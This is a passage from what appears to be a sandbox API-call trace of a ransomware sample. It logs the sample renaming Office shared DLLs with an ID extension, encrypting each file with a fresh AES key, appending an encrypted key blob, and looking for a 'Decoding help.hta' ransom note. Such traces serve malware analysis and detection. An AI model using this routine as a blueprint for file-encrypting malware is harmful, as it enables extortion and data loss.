Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0044.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0044.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="FBIBLIO.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL" [0044.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL" [0044.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0044.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0044.235] CreateFileMappingA (hFile=0x42c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x708 [0044.235] CryptAcquireContextA (in: phProv=0x9c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9c4fcec*=0x3448d80) returned 1 [0044.235] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x9c4fce8 | out: phKey=0x9c4fce8*=0x5da5f8) returned 1 [0044.235] CryptExportKey (in: hKey=0x5da5f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x9c4fbe4, pdwDataLen=0x9c4fce4 | out: pbData=0x9c4fbe4*, pdwDataLen=0x9c4fce4*=0x2c) returned 1 [0044.235] MapViewOfFile (hFileMappingObject=0x708, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e380) returned 0x3f90000 [0044.304] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9c4fbe4*, pdwDataLen=0x9c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x9c4fbe4*, pdwDataLen=0x9c4fcf8*=0x100) returned 1 [0044.304] CryptEncrypt (in: hKey=0x5da5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f90000, pdwDataLen=0x9c4fce4*=0x1e380, dwBufLen=0x1e380 | out: pbData=0x3f90000*, pdwDataLen=0x9c4fce4*=0x1e380) returned 1 [0044.350] UnmapViewOfFile (lpBaseAddress=0x3f90000) returned 1 [0044.353] CloseHandle (hObject=0x708) returned 1 [0044.353] CryptDestroyKey (hKey=0x5da5f8) returned 1 [0044.353] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0044.353] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.353] WriteFile (in: hFile=0x42c, lpBuffer=0x9c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x9c4fbe4*, lpNumberOfBytesWritten=0x9c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.354] WriteFile (in: hFile=0x42c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x9c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x9c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.354] CloseHandle (hObject=0x42c) returned 1 [0044.356] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.356] FindNextFileW (in: hFindFile=0x5da5b8, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x17f80, dwReserved0=0x0, dwReserved1=0x0, cFileName="FDATE.DLL", cAlternateFileName="")) returned 1 [0044.356] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0044.356] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0044.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" [0044.356] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\decoding help.hta")) returned 0x1 [0044.356] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FDATE.DLL") returned -1 [0044.356] lstrlenW (lpString="FDATE.DLL") returned 9 [0044.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0044.356] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0044.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="FDATE.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL" [0044.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL" [0044.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0044.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0044.358] CreateFileMappingA (hFile=0x42c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x708 [0044.358] CryptAcquireContextA (in: phProv=0x9c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9c4fcec*=0x3448d80) returned 1 [0044.359] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x9c4fce8 | out: phKey=0x9c4fce8*=0x5da438) returned 1 [0044.359] CryptExportKey (in: hKey=0x5da438, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x9c4fbe4, pdwDataLen=0x9c4fce4 | out: pbData=0x9c4fbe4*, pdwDataLen=0x9c4fce4*=0x2c) returned 1 [0044.359] MapViewOfFile (hFileMappingObject=0x708, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17f80) returned 0x3f90000 [0044.407] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9c4fbe4*, pdwDataLen=0x9c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x9c4fbe4*, pdwDataLen=0x9c4fcf8*=0x100) returned 1 [0044.408] CryptEncrypt (in: hKey=0x5da438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f90000, pdwDataLen=0x9c4fce4*=0x17f80, dwBufLen=0x17f80 | out: pbData=0x3f90000*, pdwDataLen=0x9c4fce4*=0x17f80) returned 1 [0045.659] UnmapViewOfFile (lpBaseAddress=0x3f90000) returned 1 [0045.878] CloseHandle (hObject=0x708) returned 1 [0045.878] CryptDestroyKey (hKey=0x5da438) returned 1 [0045.878] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0045.878] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.878] WriteFile (in: hFile=0x42c, lpBuffer=0x9c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x9c4fbe4*, lpNumberOfBytesWritten=0x9c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.879] WriteFile (in: hFile=0x42c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x9c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x9c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.879] CloseHandle (hObject=0x42c) returned 1 [0045.881] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.881] FindNextFileW (in: hFindFile=0x5da5b8, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x618eeb70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x35380, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPERSON.DLL", cAlternateFileName="")) returned 1 [0045.881] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0045.881] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0045.881] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" [0045.881] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\decoding help.hta")) returned 0x1 [0045.881] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FPERSON.DLL") returned -1 [0045.881] lstrlenW (lpString="FPERSON.DLL") returned 11 [0045.881] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0045.882] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0045.882] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="FPERSON.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL" [0045.882] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL" [0045.882] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0045.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.170] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0051.170] CreateFileMappingA (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x194 [0051.170] CryptAcquireContextA (in: phProv=0x9c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9c4fcec*=0x3449578) returned 1 [0054.715] CryptGenKey (in: hProv=0x3449578, Algid=0x6610, dwFlags=0x1, phKey=0x9c4fce8 | out: phKey=0x9c4fce8*=0x5a5fb0) returned 1 [0054.715] CryptExportKey (in: hKey=0x5a5fb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x9c4fbe4, pdwDataLen=0x9c4fce4 | out: pbData=0x9c4fbe4*, pdwDataLen=0x9c4fce4*=0x2c) returned 1 [0054.715] MapViewOfFile (hFileMappingObject=0x194, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x35380) returned 0x6890000 [0054.723] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9c4fbe4*, pdwDataLen=0x9c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x9c4fbe4*, pdwDataLen=0x9c4fcf8*=0x100) returned 1 [0054.724] CryptEncrypt (in: hKey=0x5a5fb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6890000, pdwDataLen=0x9c4fce4*=0x35380, dwBufLen=0x35380 | out: pbData=0x6890000*, pdwDataLen=0x9c4fce4*=0x35380) returned 1 [0054.786] UnmapViewOfFile (lpBaseAddress=0x6890000) returned 1 [0054.790] CloseHandle (hObject=0x194) returned 1 [0054.790] CryptDestroyKey (hKey=0x5a5fb0) returned 1 [0054.790] CryptReleaseContext (hProv=0x3449578, dwFlags=0x0) returned 1 [0054.790] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.790] WriteFile (in: hFile=0x298, lpBuffer=0x9c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x9c4fbe4*, lpNumberOfBytesWritten=0x9c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.937] WriteFile (in: hFile=0x298, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x9c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x9c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.937] CloseHandle (hObject=0x298) returned 1 [0056.937] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x5da5b8, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66f78700, ftCreationTime.dwHighDateTime=0x1cb7000, ftLastAccessTime.dwLowDateTime=0xc251c2e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x66f78700, ftLastWriteTime.dwHighDateTime=0x1cb7000, nFileSizeHigh=0x0, nFileSizeLow=0x2c380, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPLACE.DLL", cAlternateFileName="")) returned 1 [0058.472] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0058.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0058.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" [0058.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\decoding help.hta")) returned 0x1 [0058.472] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FPLACE.DLL") returned -1 [0058.472] lstrlenW (lpString="FPLACE.DLL") returned 10 [0058.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0058.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0058.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="FPLACE.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" [0058.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" [0058.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.473] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0058.473] CreateFileMappingA (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2ac [0058.473] CryptAcquireContextA (in: phProv=0x9c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9c4fcec*=0x2aac6770) returned 1 [0060.222] CryptGenKey (in: hProv=0x2aac6770, Algid=0x6610, dwFlags=0x1, phKey=0x9c4fce8 | out: phKey=0x9c4fce8*=0x671270) returned 1 [0060.222] CryptExportKey (in: hKey=0x671270, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x9c4fbe4, pdwDataLen=0x9c4fce4 | out: pbData=0x9c4fbe4*, pdwDataLen=0x9c4fce4*=0x2c) returned 1 [0060.222] MapViewOfFile (hFileMappingObject=0x2ac, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c380) returned 0xc560000 Thread: id = 385 os_tid = 0xac0 [0043.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*", lpFindFileData=0x1895fd30 | out: lpFindFileData=0x1895fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da4f8 [0043.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.858] FindNextFileW (in: hFindFile=0x5da4f8, lpFindFileData=0x1895fd30 | out: lpFindFileData=0x1895fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.858] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.858] FindNextFileW (in: hFindFile=0x5da4f8, lpFindFileData=0x1895fd30 | out: lpFindFileData=0x1895fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcedc00, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcfcedc00, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSE.EXE", cAlternateFileName="")) returned 1 [0043.858] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*" [0043.858] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*") returned 68 [0043.859] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\Decoding help.hta" [0043.859] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 